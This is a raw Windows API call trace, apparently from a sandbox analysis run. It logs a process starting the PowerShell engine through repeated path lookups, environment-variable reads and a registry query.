	[0171.147] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a38bc8*="Available", lpRawData=0x2a38a84) returned 1
	[0171.154] GetLastError () returned 0x0
	[0171.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.154] GetLastError () returned 0xcb
	[0171.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.155] GetLastError () returned 0xcb
	[0171.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e368, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.300] GetLastError () returned 0xcb
	[0171.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.300] GetLastError () returned 0xcb
	[0171.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.300] GetLastError () returned 0xcb
	[0171.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.303] GetLastError () returned 0xcb
	[0171.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.303] GetLastError () returned 0xcb
	[0171.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.303] GetLastError () returned 0xcb
	[0171.303] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0171.303] GetLastError () returned 0xcb
	[0171.303] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.304] GetLastError () returned 0xcb
	[0171.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetCurrentProcessId () returned 0xb30
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.305] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.306] GetLastError () returned 0xcb
	[0171.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e81c | out: phkResult=0x10e81c*=0x384) returned 0x0
	[0171.307] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e864, lpData=0x0, lpcbData=0x10e860*=0x0 | out: lpType=0x10e864*=0x1, lpData=0x0, lpcbData=0x10e860*=0x56) returned 0x0
	[0171.307] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e864, lpData=0x584bc0, lpcbData=0x10e860*=0x56 | out: lpType=0x10e864*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e860*=0x56) returned 0x0
	[0171.308] RegCloseKey (hKey=0x384) returned 0x0
	[0171.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e30c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.308] GetLastError () returned 0xcb
	[0171.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.308] GetLastError () returned 0xcb
	[0171.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.309] GetLastError () returned 0xcb
	[0171.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.309] GetLastError () returned 0xcb
	[0171.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.309] GetLastError () returned 0xcb
	[0171.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.309] GetLastError () returned 0xcb
	[0171.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0171.320] GetLastError () returned 0xcb
	[0171.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.320] GetLastError () returned 0xcb
	[0171.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.320] GetLastError () returned 0xcb
	[0171.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.320] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.321] GetLastError () returned 0xcb
	[0171.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d984, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d934, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.322] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
	[0171.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0171.323] GetLastError () returned 0xcb
